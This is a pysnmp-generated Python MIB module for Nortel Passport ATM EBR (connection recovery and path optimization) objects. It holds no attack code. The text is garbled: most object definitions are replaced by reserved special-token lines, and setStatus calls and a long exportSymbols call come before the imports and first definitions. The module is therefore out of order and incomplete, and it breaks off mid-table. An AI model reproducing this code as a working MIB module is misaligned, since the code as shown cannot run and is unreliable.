mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrComponentName.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStorageType.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrIndex.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrProvTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrOperTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
<|reserved_special_token_0|>
if mibBuilder.loadTexts:
mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')
<|reserved_special_token_0|>
mibBuilder.exportSymbols('Nortel-MsCarrier-MscPassport-AtmEbrMIB',
mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA,
mscAtmIfUniEbrTotalConnectionRecoveries=
mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=
mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=
mscAtmIfVptPnniEbrProvEntry,
mscAtmIfVptVccEbrInfoTotalPathOptimizations=
mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=
mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=
mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup,
mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery,
mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry,
mscAtmIfVptUniEbrTotalPathOptimizations=
mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=
mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr,
mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization,
mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry,
mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType,
mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus,
mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable,
mscAtmIfVptPnniEbrSubscribedConnections=
mscAtmIfVptPnniEbrSubscribedConnections,
mscAtmIfVccEbrInfoTotalPathOptimizations=
mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=
mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=
mscAtmIfVptUniEbrProvEntry,
mscAtmIfVptPnniEbrEligibleRecoveredConnections=
mscAtmIfVptPnniEbrEligibleRecoveredConnections,
mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName,
mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry,
mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex,
mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType,
mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable,
mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization,
mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry,
mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry,
mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType,
mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry,
mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,
mscAtmIfPnniEbrTotalConnectionRecoveries=
mscAtmIfPnniEbrTotalConnectionRecoveries,
mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,
mscAtmIfPnniEbrEligibleRecoveredConnections=
mscAtmIfPnniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoRecoverySubscribed=
mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=
mscAtmIfVptVccSrcEbrOvProvTable,
mscAtmIfVptVccEbrInfoConnectionRecovered=
mscAtmIfVptVccEbrInfoConnectionRecovered,
mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,
mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,
mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,
mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,
mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,
mscAtmIfVptIispEbrTotalPathOptimizations=
mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=
mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,
mscAtmIfVptUniEbrIneligibleRecoveredConnections=
mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02
=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=
mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=
mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=
mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=
mscAtmIfVpcSrcEbrOvOptimizationSubscribed,
mscAtmIfIispEbrTotalPathOptimizations=
mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName
=mscAtmIfVccSrcEbrOvComponentName,
mscAtmIfVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=
mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=
mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=
mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=
mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=
mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=
mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=
mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=
mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=
mscAtmIfIispEbrRowStatusEntry,
mscAtmIfVptIispEbrIneligibleRecoveredConnections=
mscAtmIfVptIispEbrIneligibleRecoveredConnections,
atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,
mscAtmIfVptVccEbrInfoOptimizationSubscribed=
mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=
mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=
mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=
mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=
mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=
mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=
mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=
mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=
mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=
mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=
mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=
mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=
mscAtmIfPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,
mscAtmIfVptPnniEbrIneligibleRecoveredConnections=
mscAtmIfVptPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcEbrInfoConnectionRecovered=
mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=
mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=
mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=
mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations
=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=
mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=
mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=
mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=
mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=
mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,
mscAtmIfVptUniEbrTotalConnectionRecoveries=
mscAtmIfVptUniEbrTotalConnectionRecoveries,
mscAtmIfVpcEbrInfoTotalConnectionRecoveries=
mscAtmIfVpcEbrInfoTotalConnectionRecoveries,
mscAtmIfVptVccSrcEbrOvRowStatusEntry=
mscAtmIfVptVccSrcEbrOvRowStatusEntry,
mscAtmIfIispEbrTotalConnectionRecoveries=
mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=
mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=
mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=
mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=
mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=
mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=
mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=
mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=
mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=
mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=
mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=
mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=
mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=
mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=
mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry
=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=
mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=
mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=
mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=
mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=
mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=
mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=
mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,
mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,
mscAtmIfVptPnniEbrTotalConnectionRecoveries=
mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=
mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=
mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=
mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=
mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=
mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=
mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=
mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=
mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=
mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=
mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=
mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=
mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=
mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=
mscAtmIfVptVccSrcEbrOvComponentName,
mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,
mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,
mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,
mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,
mscAtmIfUniEbrEligibleRecoveredConnections=
mscAtmIfUniEbrEligibleRecoveredConnections,
mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,
mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,
mscAtmIfIispEbrEligibleRecoveredConnections=
mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=
mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=
mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=
mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=
mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=
mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=
mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=
mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=
mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=
mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=
mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=
mscAtmIfPnniEbrConnectionRecovery,
mscAtmIfVccEbrInfoConnectionRecovered=
mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=
mscAtmIfVccEbrInfoStatsEntry,
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,
mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,
mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,
mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,
mscAtmIfVccSrcEbrOvRecoverySubscribed=
mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=
atmEbrCapabilities, mscAtmIfUniEbrComponentName=
mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=
mscAtmIfPnniEbrTotalPathOptimizations,
mscAtmIfUniEbrIneligibleRecoveredConnections=
mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=
mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=
mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=
mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=
mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=
mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=
mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=
mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=
mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,
mscAtmIfVccEbrInfoOptimizationSubscribed=
mscAtmIfVccEbrInfoOptimizationSubscribed,
mscAtmIfVptVccSrcEbrOvRowStatusTable=
mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,
mscAtmIfVptVccEbrInfoRecoverySubscribed=
mscAtmIfVptVccEbrInfoRecoverySubscribed,
mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,
mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,
mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,
mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,
mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,
mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,
mscAtmIfIispEbrIneligibleRecoveredConnections=
mscAtmIfIispEbrIneligibleRecoveredConnections,
mscAtmIfVptIispEbrConnectionRecovery=
mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=
mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,
mscAtmIfVptIispEbrTotalConnectionRecoveries=
mscAtmIfVptIispEbrTotalConnectionRecoveries,
mscAtmIfUniEbrTotalPathOptimizations=
mscAtmIfUniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvRecoverySubscribed=
mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=
mscAtmIfVptPnniEbrOperTable,
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,
mscAtmIfVptUniEbrEligibleRecoveredConnections=
mscAtmIfVptUniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoOptimizationSubscribed=
mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=
mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=
mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=
mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=
mscAtmIfVptVccSrcEbrOvStorageType,
mscAtmIfVptPnniEbrTotalPathOptimizations=
mscAtmIfVptPnniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,
mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,
mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,
mscAtmIfVptVccSrcEbrOvRecoverySubscribed=
mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=
mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,
mscAtmIfVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVccEbrInfoTotalConnectionRecoveries)
<|reserved_special_token_1|>
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols('ASN1',
'Integer', 'ObjectIdentifier', 'OctetString')
NamedValues, = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')
(ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint,
ConstraintsUnion, ConstraintsIntersection) = (mibBuilder.importSymbols(
'ASN1-REFINEMENT', 'ValueRangeConstraint', 'SingleValueConstraint',
'ValueSizeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection'))
(mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex,
mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex) = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmCoreMIB',
'mscAtmIfIndex', 'mscAtmIfVptIndex', 'mscAtmIfVcc',
'mscAtmIfVptVccIndex', 'mscAtmIfVpc', 'mscAtmIfVptVcc',
'mscAtmIfVccIndex', 'mscAtmIfVpcIndex'))
mscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmIispMIB',
'mscAtmIfIisp', 'mscAtmIfVptIisp', 'mscAtmIfVptIispIndex',
'mscAtmIfIispIndex'))
(mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex,
mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc) = (mibBuilder.
importSymbols('Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',
'mscAtmIfVpcSrc', 'mscAtmIfVptVccSrcIndex', 'mscAtmIfVccSrcIndex',
'mscAtmIfVptVccSrc', 'mscAtmIfVpcSrcIndex', 'mscAtmIfVccSrc'))
mscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmPnniMIB',
'mscAtmIfVptPnniIndex', 'mscAtmIfPnniIndex', 'mscAtmIfPnni',
'mscAtmIfVptPnni'))
mscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmUniMIB',
'mscAtmIfVptUni', 'mscAtmIfUni', 'mscAtmIfUniIndex', 'mscAtmIfVptUniIndex')
)
Counter32, DisplayString, Gauge32, StorageType, RowStatus = (mibBuilder.
importSymbols(
'Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB',
'Counter32', 'DisplayString', 'Gauge32', 'StorageType', 'RowStatus'))
NonReplicated, = mibBuilder.importSymbols(
'Nortel-MsCarrier-MscPassport-TextualConventionsMIB', 'NonReplicated')
mscPassportMIBs, = mibBuilder.importSymbols(
'Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB', 'mscPassportMIBs')
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols('SNMPv2-CONF',
'NotificationGroup', 'ModuleCompliance')
(Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress,
Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow,
MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks) = (
mibBuilder.importSymbols('SNMPv2-SMI', 'Integer32', 'ObjectIdentity',
'ModuleIdentity', 'Bits', 'Counter32', 'IpAddress', 'Gauge32',
'NotificationType', 'iso', 'MibScalar', 'MibTable', 'MibTableRow',
'MibTableColumn', 'MibIdentifier', 'Unsigned32', 'Counter64', 'TimeTicks'))
TextualConvention, DisplayString = mibBuilder.importSymbols('SNMPv2-TC',
'TextualConvention', 'DisplayString')
atmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))
mscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
4, 6, 2))
mscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 4, 6, 2, 1))
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 4, 6, 2, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),
(0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
